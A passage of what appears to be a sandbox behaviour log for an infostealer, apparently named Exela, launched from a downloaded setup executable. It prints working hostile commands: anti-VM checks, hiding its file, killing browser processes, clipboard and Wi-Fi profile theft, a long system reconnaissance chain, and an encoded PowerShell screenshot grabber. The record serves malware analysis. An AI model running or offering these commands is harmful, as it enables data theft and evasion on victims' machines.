C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd832646f8,0x7ffd83264708,0x7ffd832647182⤵PID:3968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:22⤵PID:1524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:82⤵PID:1660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:12⤵PID:3172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵PID:1592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:82⤵PID:5024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:12⤵PID:2308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:12⤵PID:3532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:12⤵PID:1064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:12⤵PID:548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3324 /prefetch:82⤵PID:2880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:12⤵PID:2260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2224,7936293127436118730,5240732653727997962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2616
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3396
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1504
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2144
-
C:\Users\Admin\Downloads\setup_x86-64_build_4355\setup_x86-64_build_4355\setup_x86-64_build_4355.exe"C:\Users\Admin\Downloads\setup_x86-64_build_4355\setup_x86-64_build_4355\setup_x86-64_build_4355.exe"1⤵PID:4632
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"2⤵PID:4280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"2⤵PID:2996
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"2⤵PID:1388
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"2⤵PID:376
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"2⤵PID:3432
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"2⤵PID:232
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer3⤵PID:712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"2⤵PID:3988
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"2⤵PID:2284
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:4820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""2⤵
- Hide Artifacts: Hidden Files and Directories
PID:4052 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"3⤵
- Views/modifies file attributes
PID:2064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"2⤵PID:1200
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:4928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1352"2⤵PID:5024
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 13523⤵
- Kills process with taskkill
PID:3432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3968"2⤵PID:4796
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 39683⤵
- Kills process with taskkill
PID:376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1524"2⤵PID:1900
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 15243⤵
- Kills process with taskkill
PID:2880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2956"2⤵PID:380
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 29563⤵
- Kills process with taskkill
PID:4052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1660"2⤵PID:3504
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 16603⤵
- Kills process with taskkill
PID:4824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1592"2⤵PID:4748
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 15923⤵
- Kills process with taskkill
PID:1216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 548"2⤵PID:2476
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 5483⤵
- Kills process with taskkill
PID:4708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2260"2⤵PID:1672
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 22603⤵
- Kills process with taskkill
PID:2724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"2⤵PID:1100
-
C:\Windows\system32\cmd.execmd.exe /c chcp3⤵PID:2996
-
C:\Windows\system32\chcp.comchcp4⤵PID:1988
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"2⤵PID:3060
-
C:\Windows\system32\cmd.execmd.exe /c chcp3⤵PID:3260
-
C:\Windows\system32\chcp.comchcp4⤵PID:2252
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"2⤵PID:4084
-
C:\Windows\system32\tasklist.exetasklist /FO LIST3⤵
- Enumerates processes with tasklist
PID:3876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"2⤵
- Clipboard Data
PID:1524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard3⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:1660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"2⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3144 -
C:\Windows\system32\netsh.exenetsh wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"2⤵
- Network Service Discovery
PID:3176 -
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:1244
-
-
C:\Windows\system32\HOSTNAME.EXEhostname3⤵PID:3932
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername3⤵
- Collects information from the system
PID:232
-
-
C:\Windows\system32\net.exenet user3⤵PID:636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user4⤵PID:4536
-
-
-
C:\Windows\system32\query.exequery user3⤵PID:2668
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"4⤵PID:3508
-
-
-
C:\Windows\system32\net.exenet localgroup3⤵PID:3184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup4⤵PID:3140
-
-
-
C:\Windows\system32\net.exenet localgroup administrators3⤵PID:4432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators4⤵PID:4280
-
-
-
C:\Windows\system32\net.exenet user guest3⤵PID:3908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest4⤵PID:3744
-
-
-
C:\Windows\system32\net.exenet user administrator3⤵PID:2508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator4⤵PID:2828
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command3⤵PID:2476
-
-
C:\Windows\system32\tasklist.exetasklist /svc3⤵
- Enumerates processes with tasklist
PID:2172
-
-
C:\Windows\system32\ipconfig.exeipconfig /all3⤵
- Gathers network information
PID:3048
-
-
C:\Windows\system32\ROUTE.EXEroute print3⤵PID:3548
-
-
C:\Windows\system32\ARP.EXEarp -a3⤵
- Network Service Discovery
PID:3612
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano3⤵
- System Network Connections Discovery
- Gathers network information
PID:4448
-
-
C:\Windows\system32\sc.exesc query type= service state= all3⤵
- Launches sc.exe
PID:208
-
-
C:\Windows\system32\netsh.exenetsh firewall show state3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4128
-
-
C:\Windows\system32\netsh.exenetsh firewall show config3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"2⤵PID:1392
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:3872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="2⤵PID:1140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuA